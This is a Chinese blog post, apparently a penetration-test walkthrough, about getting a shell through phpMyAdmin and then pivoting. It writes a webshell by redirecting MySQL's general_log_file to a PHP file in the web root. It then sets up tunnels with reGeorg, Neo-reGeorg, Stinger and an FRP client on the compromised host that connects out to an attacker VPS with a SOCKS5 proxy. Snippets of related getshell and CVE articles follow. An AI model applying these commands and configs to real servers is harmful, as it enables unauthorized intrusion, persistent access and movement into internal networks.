PhpAdmin-getshell

最新推荐文章于 2024-05-27 17:25:08 发布
最新推荐文章于 2024-05-27 17:25:08 发布
阅读量655 收藏 5
点赞数 8
文章标签: python 数据结构 服务器 线性回归 链表 排序算法 动态规划
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A345545108/article/details/138342482
版权
文章描述了一次通过PHPAdmin未授权写入漏洞获取shell的过程,涉及木马植入、日志利用、网络扫描、代理工具如SocksProxy和FRP的搭建,以及Stinger恶意软件的使用。
摘要由CSDN通过智能技术生成

PhpAdmin-getshell

通过未授权成功写入,然后getshell

路径:C:\phpstudy_pro\Extensions\MySQL5.7.26\
写入木马: into写入文件:
使用需看要secure_file_priv的值。
当value为“null”时,不允许读取任意文件
当value为“空”时,允许读取任意文件
value可也已设置为其他路径。
show variables like "%general%";

general_log和general_log_file简述:
mysql打开general_log开关之后,所有对数据库的操作都将记录在general_log_file指定的文件目录中,以原始的状态来显示,如果将general_log开关打开,general_log_file指定一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,可以通过访问general_log_file指定的文件来获取webshell。
开启日志记录:set global general_log = “ON”;再查询日志状态。
set global general_log_file=‘C:/phpstudy_pro/www/shell1.php’;

写入shell1.php

扫描另一个网段发现存在ms17-010和域机器。

代理搭建:

python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp
python neoreg.py  -u http://192.168.163.138/www.yxcms6.com/protected/apps/default/view/default/tunnel.php --proxy socks5://10.1.1.1:8888
毒刺
webshell
 windows:start D:/XXX/stinger_server.exe 0.0.0.0
客户端(vps)
./stinger_client -w http://192.168.163.138/www.yxcms6.com/protected/apps/default/view/default/proxy.php -l 127.0.0.1 -p 60000

 

使用哥斯拉内置代理。


 

搭建FRP

VPS设置服务端

[common]
bind_port = 57000
token = 123qwe    
heartbeat_timeout = 90  
max_pool_count = 5

webshell设置客户端

[common]
server_addr = 1.1.1.1
server_port = 57000
token = 123qwe
pool_count = 5
protocol = tcp
health_check_type = tcp
health_check_interval_s = 100


[socks_test]
remote_port = 10000  
plugin = socks5
plugin_user = admin
plugin_passwd = password
use_encryption = true
use_compression = true

 

海安P海云
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
phpmyadmin getshell
YouthBelief的博客
11-11 4971
phpmyadmin getshell前言一、into outfile写马条件利用方法操作二、开启日志写马getshell条件利用方法操作三、慢查询webshell利用方法操作四、创建数据库和表写入webshell条件利用方法特殊版本getshell 前言 phpMyadmin是一个以PHP为基础的MySQL数据库管理工具,使网站管理员可通过Web接口管理数据库。 虽然网上有很多公开的文章,也用过很多次了,但自己再总结一遍方便自己查阅。 一、into outfile写马 条件 1.对web目录需要有写权限能
phpmyadmin之getshell总结
Adminxe的博客
05-03 501
0x00 前言 简单总结下phpmyadmin的gestshell的姿势,总结但不拓展(百度是最好的老师,有时间必定会详细写出利用姿势的方法),建议getshell之前,查看用户权限以及phpmyadmin的版本,方便对于漏洞的利用。 0x01 getshell姿势 1、selectintooutfile直接写入 2、开启全局日志getshell 3、使用慢查询日志getse...
phpmyadmin漏洞汇总
最新发布
m0_64481831的博客
05-27 1124
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
最全phpmyadmin漏洞汇总
m0_67402013的博客
07-31 9523
phpMyAdmin是一个用php编写的免费软件工具,旨在通过Web友好界面处理MySQL的管理。phpMyAdmin支持对MySQL和MariaDB数据库的广泛操作。经常使用的操作(有如管理数据库、表、列、关系、索引、用户、权限等)可以通过用户界面执行,当然您也可以直接执行任何SQL语句。从1998年发布第一版,到目前发布的最新版为5.1.1,全部历史版本说明phpMyAdmin5.2未来版本与PHP7.2及更高版本和MySQL/MariaDB5.5及更高版本兼容。1、1、条件。...
phpmyadmin反序列化漏洞
qq_53008544的博客
05-01 568
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
phpmyadmin后台文件包含漏洞分析
nareku的博客
04-10 5924
前言 在墨者学院看到这道题给的标签是文件包含,就想着拿来练练手,果然不练不知道一练吓一跳,里面还是有很多我没学到和不懂的知识,所以就打算单独拿出来写一篇博客来记录一下。
docker-laravel-8:一个简单的Docker-Laravel 8-MySQL-Redis-PHPAdmin-NGINX-PHP 7.4-作曲家-Artisan-XDebug
05-19
码头工人-Laravel 一个非常简化的Docker Compose工作流,它为本地Laravel开发设置了一个容器的LEMP(Linux,NGINX,MySQL,PHP)网络。港口项目中使用的端口: 软件港口Nginx的8080 ... 创建按照下面的说明。 使用以下
phpadmin 4.4
12-19
**phpMyAdmin 4.4 知识点详解** phpMyAdmin 是一款广泛使用的开源 Web 应用程序,专门设计用于管理和操作 MySQL 数据库。它提供了直观的图形用户界面(GUI),使得数据库管理员、开发人员以及对 SQL 不太熟悉的用户...
phpadmin 操作数据库
11-30
**phpMyAdmin 知识详解** phpMyAdmin 是一款功能强大的、开源的Web应用程序,用于管理和维护MySQL或MariaDB数据库。它提供了一个直观且易于使用的界面,使得即使没有深厚技术背景的用户也能轻松进行数据库操作。...
详谈phpAdmin修改密码后拒绝访问的问题
10-20
下面小编就为大家带来一篇详谈phpAdmin修改密码后拒绝访问的问题。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
phpadmin安装和配置
11-25
### PHPAdmin 安装与配置详解 #### 一、引言 PHPAdmin 是一款功能强大的图形界面工具,专为 MySQL 数据库设计,提供了一个简单直观的网页界面来管理数据库。对于那些希望远程管理 MySQL 数据库的用户来说,...
phpmyadmin getshell的四种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-20 1788
phpmyadmin常见的getshell的几种方法,一共是四种:1、日志文件写 shell2、在知道绝对路径的情况下,利用INTO OUTFILE3、慢查询写入webshell4、创建数据库和表写入webshell: 1、日志文件写 shell(phpmyadmin getshell的四种方法) general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell
phpmyadminV4.8.1本地文件包含漏洞复现
seek_2022的博客
07-05 2791
出于学习和技术分享的目的,本文针对phpMyadmin-v4.8.1存在的文件包含漏洞,通过代码审计结合本地搭建测试环境的方式进行漏洞复现研究,以供大家参考学习。
php如何用菜刀连接getshell,phpmyadmin之getshell总结
weixin_34802266的博客
03-16 476
title: phpmyadmin中getshell的几种姿势1,利用全局变量general_log去getshellshow variables like ‘%general%’;然后将general_log打开,执行命令set global general_log=on;因为phpstudy默认的根目录是/phpstudy/www/,所以接下来只需要修改日志文件的位置到网站的根目录下。set ...
phpmyadmin getshell总结
good good study
10-25 3175
phpMyAdmin 是一个用PHP编写的开源软件工具,可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin 可以完全对数据库进行操作,例如建立、复制和删除数据等。
CVE-2018-12613 phpadmin文件包含漏洞
鱼开yk2的博客
10-15 807
网址: https://www.phpmyadmin.net/security/PMASA-2018-4/ 摘要 文件包含和远程执行代码攻击 描述 发现了一个漏洞,攻击者可以在该漏洞中包含(查看并可能执行)服务器上的文件。 该漏洞来自代码的一部分,其中页面在phpMyAdmin中重定向和加载,以及对白名单页面的不正确测试。 除以下情况外,必须对攻击者进行身份验证: $ cfg [‘Allow...
CVE-2018-12613Phpmyadmin后台 任意文件包含漏洞复现
Mikasa
03-16 4439
PHPmyadmin后台文件包含漏洞 环境搭建:因为是新手,完全没有经验。。。弄了好长时间。。一开始想在本机搭建环境,于是上网上下载了一个phpmyadmin,然后下载一个phpMyAdmin-4.8.1实验,但是出现语法错误(心态炸了)。。。。 然后只能够下一个版本低的试试,于是下载了一个2016的phpstudy,然后就想放虚拟机(2003)试试,然后又炸了,因为这个版本的phpstudy需要...
PhpMyAdmin漏洞利用总结with Metasploit
ncafei的博客
03-27 6884
一: 影响版本:3.5.x 概述:PhpMyAdmin存在PREG_REPLACE_EVAL漏洞 利用模块:exploit/multi/http/phpmyadmin_preg_replace CVE: CVE-2013-3238 二: 影响版本:phpMyAdmin v3.5.2.2 概述:PhpMyAdmin存在server_sync.PHP  后门漏洞 利用模块:explo
phpadmin操作mysql数据库
03-16
PHPAdmin是一个基于Web的MySQL管理工具,可以通过浏览器连接到MySQL数据库,并对数据库进行管理。 使用PHPAdmin,您可以执行以下操作: 1. 创建、编辑、删除数据库和表格。 2. 插入、更新、删除数据。 3. 执行SQL查询。 4. 导入和导出数据。 5. 管理用户和权限。 6. 查看服务器状态和日志。 要开始使用PHPAdmin,您需要在Web服务器上安装和配置PHP和MySQL,并将PHPAdmin安装到Web服务器上。然后,您可以通过浏览器访问PHPAdmin,并使用MySQL用户名和密码登录。 一旦登录,您就可以使用PHPAdmin的各种工具来管理您的MySQL数据库。您可以浏览数据库和表格、添加和编辑数据、执行SQL查询等等。PHPAdmin还提供了一些其他有用的功能,例如导入和导出数据以及管理用户和权限。 总之,PHPAdmin是一个非常方便的工具,可以让您轻松管理MySQL数据库,而无需使用命令行或其他复杂的工具。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值